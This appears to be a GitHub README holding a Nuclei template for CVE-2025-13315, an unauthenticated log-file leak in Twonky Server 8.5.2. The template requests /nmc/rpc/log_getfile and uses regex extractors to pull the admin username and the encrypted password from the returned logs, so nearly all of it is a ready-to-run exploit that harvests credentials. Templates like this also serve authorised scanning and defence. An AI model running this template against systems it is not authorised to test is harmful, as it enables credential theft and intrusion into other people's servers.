README.md
Rendering markdown...
id: CVE-2025-13315
info:
name: Twonky Server 8.5.2 - Unauthenticated Log File Leak (CVE-2025-13315)
author: 0xBlackash
severity: critical
description: |
An unauthenticated attacker can access /nmc/rpc/log_getfile and retrieve application logs containing the admin username and encrypted password.
reference:
- https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
- https://nvd.nist.gov/vuln/detail/CVE-2025-13315
tags: cve,cve2025,twonky,log-leak,unauth,exposure
http:
- method: GET
path:
- "{{BaseURL}}/nmc/rpc/log_getfile"
- "{{BaseURL}}/rpc/log_getfile"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "len(body) > 50000" # Most Twonky logs are large (your case was 340KB)
- "duration < 10" # Quick response
- type: word
words:
- "Twonky"
- "Media Server"
- "accessuser"
- "accesspwd"
- "||"
condition: or
part: body
case-insensitive: true
extractors:
- type: regex
name: username
regex:
- '(?i)(?:accessuser|username|admin)\s*[:=]\s*([^\s\r\n]+)'
part: body
- type: regex
name: encrypted_password
regex:
- '(?i)(?:accesspwd|password)\s*[:=]\s*([^\s\r\n]+)'
part: body
- type: regex
name: encrypted_hex
regex:
- '\|\|([0-9a-fA-F]{16,})'
part: body